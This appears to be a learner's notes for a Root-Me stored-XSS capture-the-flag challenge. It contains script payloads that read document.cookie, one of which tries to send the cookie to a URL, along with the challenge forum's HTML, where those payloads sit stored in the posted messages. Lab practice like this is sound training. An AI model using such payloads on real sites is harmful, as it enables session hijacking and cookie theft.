XSS Stockée 1

<script>alert(document.write(src ="http://challenge01.root-me.org/web-client/ch18/index.php?cookie="+ document.cookie));</script>

<script>alert(document.write(document.cookie));</script>

index :

<html>
    <head>
      <title>Forum v0.001</title>
    </head>
   <body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
        <h1>Forum v0.001</h1>
    <hr/>
    <span style="text-align: right; float:right;">Status: visitor</span><br/>


            <form action="" method="POST" >
            <div>
                Title:<br/>
                <input type="text" name="titre" value="" />
            </div><br/>
            <div>
                Message:<br/>
                <textarea name="message" rows="3" cols="50"></textarea>
            </div>
            <div>
                <input type="submit" value="send" />
            </div>
        </form><br/><br/>
        <div>
            <div>Posted messages:</div><br/>
        <span><b>Welcome</b></span><br/>
        <span>N'hésitez pas à me laisser un message / Feel free to leave a message</span><br/><hr/>
        <span><b>cookies</b></span><br/><span><script>alert(document.write('cookie: ' + document.cookie));</script></span><br/><hr/>
<span><b>c</b></span><br/><span><script>alert(document.write('cookie: ' + document.cookie));</script></span><br/><hr/>
<span><b>Message read</b></span><br/><span>Vos messages ont bien été lus / Your messages have been read</span><br/><hr/>
        </div>
    </body>
</html>